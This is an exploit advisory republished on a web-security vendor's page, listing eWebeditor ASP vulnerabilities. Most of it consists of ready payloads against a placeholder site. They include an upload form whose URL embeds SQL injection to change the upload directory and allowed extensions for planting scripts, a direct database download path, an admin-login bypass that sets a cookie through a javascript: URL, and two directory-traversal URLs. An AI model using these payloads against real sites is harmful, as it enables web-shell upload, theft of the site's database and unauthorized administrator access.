eWebeditor ASP Version Multiple Vulnerabilities

2010-02-09 10:17:00 作者：root 来源：浏览次数：0 网友评论 0 条

            #################################################################





            # Application Info:





            # Name: eWebeditor

    
            #################################################################
        

    
            # Application Info:
        

    
            # Name: eWebeditor
        

    
            # Version: ASP
        

    
            #################################################################
        

    
            Vulnerability:
        

    
            =======================
        

    
            Arbitrary File Upload
        

    
            =======================
        

    
            <form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
        

    
            <p align="center">
        

    
            <input type=file name=uploadfile size=100><br> <br>
        

    
            <input type=submit value=Upload>  </p>
        

    
            </form>
        

    
            =======================
        

    
            Arbitrary File Upload 2
        

    
            =======================
        

    
            http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
        

    
            =======================
        

    
            Database Disclosure
        

    
            =======================
        

    
            http://site.com/ewebeditor/db/ewebeditor.mdb
        

    
            =======================
        

    
            Administrator bypass
        

    
            =======================
        

    
            http://site.com/eWebEditor/admin/login.asp
        

    
            put this code instead URL
        

    
            javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
        

    
            =======================
        

    
            Directory Traversal
        

    
            =======================
        

    
            http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
        

    
            =======================
        

    
            Directory Traversal 2
        

    
            =======================
        

    
            http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..

关键词：eWebeditor

eWebeditor ASP Version Multiple Vulnerabilitie...

[收藏] [打印] [关闭] [返回顶部]

已有0位网友发表了看法

eWebeditor ASP Version Multiple Vulnerabilities

2010-02-09 10:17:00 作者：root 来源：浏览次数：0 网友评论 0 条

相关文章

最新图片文章

最新文章

诺赛科技为您提供：Web应用安全,Web Application Security,SQL注入,SQL Injection,Web安全,网站安全,网站漏洞,XSS,JSky,Pangolin,Web网站安全应用,等服务。

eWebeditor ASP Version Multiple Vulnerabilities

2010-02-09 10:17:00 作者：root 来源： 浏览次数：0 网友评论 0 条

相关文章

最新图片文章

最新文章

诺赛科技为您提供：Web应用安全,Web Application Security,SQL注入,SQL Injection,Web安全,网站安全,网站漏洞,XSS,JSky,Pangolin,Web网站安全应用,等服务。

2010-02-09 10:17:00 作者：root 来源：浏览次数：0 网友评论 0 条